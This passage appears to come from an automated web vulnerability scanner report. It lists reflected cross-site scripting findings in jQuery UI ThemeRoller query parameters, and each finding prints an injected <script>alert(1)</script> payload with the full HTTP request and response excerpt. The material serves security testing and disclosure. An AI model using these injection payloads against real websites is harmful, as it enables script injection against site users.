a1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

1.102. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9db"><script>alert(1)</script>ef4213fbf23 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

1.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c10"><script>alert(1)</script>093068ed04f was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

1.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2f4"><script>alert(1)</script>a6a969de1a8 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

1.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30360"><script>alert(1)</script>3dda5c6d39d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

1.106. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9152e"><script>alert(1)</script>516645a1257 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31e6"><script>alert(1)</script>bee3a69fc06 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

1.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fca1"><script>alert(1)</script>544cc932a96 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

1.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f31c"><script>alert(1)</script>a87b30d1a5d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

1.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deade"><script>alert(1)</script>1bd88013d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?deade"><script>alert(1)</script>1bd88013d0d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:34:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&deade"><script>alert(1)</script>1bd88013d0d=1" type="text/css" media="all" />
...[SNIP]...

1.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6323d"><script>alert(1)</script>e503afc2b was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opac